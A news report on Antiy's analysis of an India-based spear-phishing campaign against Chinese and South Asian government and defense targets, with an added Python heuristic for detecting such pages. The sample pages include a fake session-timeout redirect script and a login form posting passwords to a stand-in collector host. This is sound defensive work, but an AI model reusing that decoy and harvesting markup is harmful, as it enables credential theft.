On November 1, the reporter learned from Antiy Technology Group that since March this year the group has captured a number of phishing attacks targeting China and countries of the South Asian subcontinent. Cyber attackers from India have attempted to attack China's national defense, military and state-owned enterprises. The analysis report will be released to the public soon.
It is reported that the activity involved a large number of network nodes, and that the main targets of the attack were the governments, national defense forces and state-owned enterprises of China, Pakistan, Nepal and other countries. “Attackers disguised themselves as government or military personnel of the target country, delivered attack emails with phishing attachments or embedded phishing links to the targets’ mailboxes, induced the targets in various ways to visit the phishing websites built by the attackers through those links, and collected the account passwords entered by the victims for intelligence gathering or lateral attacks.”
Antiy found that the earliest of this batch of phishing attacks can be traced back to April 2019, and that the attacking organization is based in India. The attackers mainly use social engineering (e.g. spear-phishing emails and phishing PDF documents masquerading as material from government or military personnel) to carry out large-scale phishing attacks. Their phishing methods are cunning and changeable, and the phishing emails and PDF documents they produce are very realistic. At the same time, the phishing websites take many forms, and the phishing pages are almost identical to the sites they counterfeit, which makes them hard to guard against.
According to Antiy’s description, when the attacker launches an attack by phishing email, the attacker poses as a government official or similar figure from the target country and sends an email whose body contains a link to a phishing website imitating the target’s mail system. When the victim enters an account password, the phishing website sends the victim’s credentials back to the phishing backend and automatically downloads a PDF file related to the target government or army as a cover.
The phishing websites used by the attackers are of two types: automatic redirection and direct display. In the automatic redirection type, when the victim opens the phishing page through the phishing link, the page first shows a static page under a pretext such as “access restricted” or “email system update”. After a delay set by the attacker, the page shows a pop-up such as “Your email login timed out, you have been logged out, please log in again” or “The domain where your account is located has expired”. When the victim confirms the pop-up, the page redirects to the login page of the attacker’s counterfeit email system.
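The behaviour described above (a decoy page with a timed session-expiry prompt that redirects to a counterfeit login, a login form that ships credentials to a different host, and a PDF dropped as cover) leaves recognisable traces in the page source. The following Python is an added illustration, not code from Antiy’s report: a small heuristic scorer that a defender could run over fetched or sandbox-captured HTML to flag pages with those traits. The sample pages, the `example.test` hostnames and the function names `assess_page` and `risk_level` are constructed for this example.

```python
import re
from urllib.parse import urlparse

# Heuristic indicators of the redirect-then-harvest phishing pattern.
# Plain regexes over raw HTML; a real pipeline would parse the DOM and
# execute the page in a sandbox, but these catch the common static cases.
TIMED_REDIRECT = re.compile(r"setTimeout\s*\(.*?(location|href)", re.I | re.S)
META_REFRESH = re.compile(r"<meta[^>]+http-equiv=[\"']?refresh", re.I)
SESSION_PROMPT = re.compile(
    r"(alert|confirm)\s*\(\s*[\"'][^\"']*(logged out|timed out|expired)[^\"']*[\"']", re.I)
PASSWORD_FIELD = re.compile(r"<input[^>]+type=[\"']?password", re.I)
FORM_ACTION = re.compile(r"<form[^>]+action=[\"']?([^\"'\s>]+)", re.I)
PDF_DROP = re.compile(r"(\.pdf[\"']|download=[\"'][^\"']*\.pdf)", re.I)


def assess_page(html: str, page_url: str) -> list:
    """Return the list of indicators found in the page source (order is fixed)."""
    page_host = urlparse(page_url).hostname or ""
    findings = []
    if TIMED_REDIRECT.search(html) or META_REFRESH.search(html):
        findings.append("timed_redirect")
    if SESSION_PROMPT.search(html):
        findings.append("session_expiry_prompt")
    if PASSWORD_FIELD.search(html):
        # A password form whose action points at a host other than the
        # page's own host is the classic credential-harvesting tell.
        for action in FORM_ACTION.findall(html):
            action_host = urlparse(action).hostname
            if action_host and action_host != page_host:
                findings.append("credential_form_posts_offsite")
                break
    if PDF_DROP.search(html):
        findings.append("auto_pdf_download")
    return findings


def risk_level(findings: list) -> str:
    """Collapse indicators into a triage level."""
    if "credential_form_posts_offsite" in findings or len(findings) >= 2:
        return "high"
    if findings:
        return "medium"
    return "low"


# Constructed sample pages (not real captures).
DECOY_PAGE = """<html><body><h1>Email system update in progress</h1>
<script>
setTimeout(function () {
  confirm("Your email login timed out, you have been logged out, please log in again");
  window.location.href = "https://mail-login.example.test/login";
}, 8000);
</script></body></html>"""

FAKE_LOGIN_PAGE = """<html><body>
<form action="https://collector.example.test/post.php" method="post">
  <input name="user"><input name="pass" type="password"><button>Sign in</button>
</form>
<a href="/notice.pdf" download="notice.pdf">Circular</a>
</body></html>"""

BENIGN_PAGE = """<html><body>
<form action="/login" method="post">
  <input name="user"><input name="pass" type="password">
</form></body></html>"""

if __name__ == "__main__":
    for name, html, url in [
        ("decoy", DECOY_PAGE, "https://mail-update.example.test/"),
        ("fake-login", FAKE_LOGIN_PAGE, "https://mail-login.example.test/login"),
        ("benign", BENIGN_PAGE, "https://mail.example.test/login"),
    ]:
        found = assess_page(html, url)
        print(f"{name:10s} {risk_level(found):6s} {found}")
```

The two-stage design mirrors what the article describes: the decoy page alone only shows a timer and a prompt, so scoring it in isolation still yields “high” only because both indicators appear together; the counterfeit login page is flagged on the off-site form action regardless of anything else.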
The reporter learned that, to date, Antiy has found more than 100 phishing and counterfeit websites belonging to the organization. Some target major universities, state-owned enterprises, government bodies and other important institutions in China, while most target the military, government, defense, diplomatic and other sectors of South Asian countries such as Pakistan and Nepal.
Once a phishing attack succeeds, the compromised mailbox becomes the starting point for a new wave of social engineering attacks, and endpoints implanted with Trojan horses become the “bridgehead” for further attacks, posing a serious hazard to national security, social security, government and enterprise security, and citizens’ personal safety.